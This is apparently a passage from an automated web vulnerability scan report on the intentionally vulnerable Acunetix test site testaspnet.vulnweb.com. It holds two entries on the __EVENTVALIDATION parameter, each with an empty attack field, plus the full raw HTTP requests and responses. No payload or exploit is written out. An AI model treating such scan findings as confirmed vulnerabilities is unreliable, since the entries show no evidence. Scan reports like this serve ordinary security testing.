style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8259&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAkZn1e9oIZGRkZhqLX6nTjp8%2FRkJPEtTPpIRuihg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU7ou5CwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268Dkd4O4aIHhHHw%2FBcMPiXtpuX%2BZmE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:01 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAkZn1e9oIZGRkZhqLX6nTjp8/RkJPEtTPpIRuihg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU7ou5CwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268Dkd4O4aIHhHHw/BcMPiXtpuX+ZmE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:White" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8359&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA4CqKytoIZGRkIoipOSAcMFwpFSCv5yup3hWCo3A%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLuzYC3DgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2BJtsYSrNwQ96wUkxqGDdce9wUyW
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:53 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCA4CqKytoIZGRkIoipOSAcMFwpFSCv5yup3hWCo3A=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLuzYC3DgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+JtsYSrNwQ96wUkxqGDdce9wUyW" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:White" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> 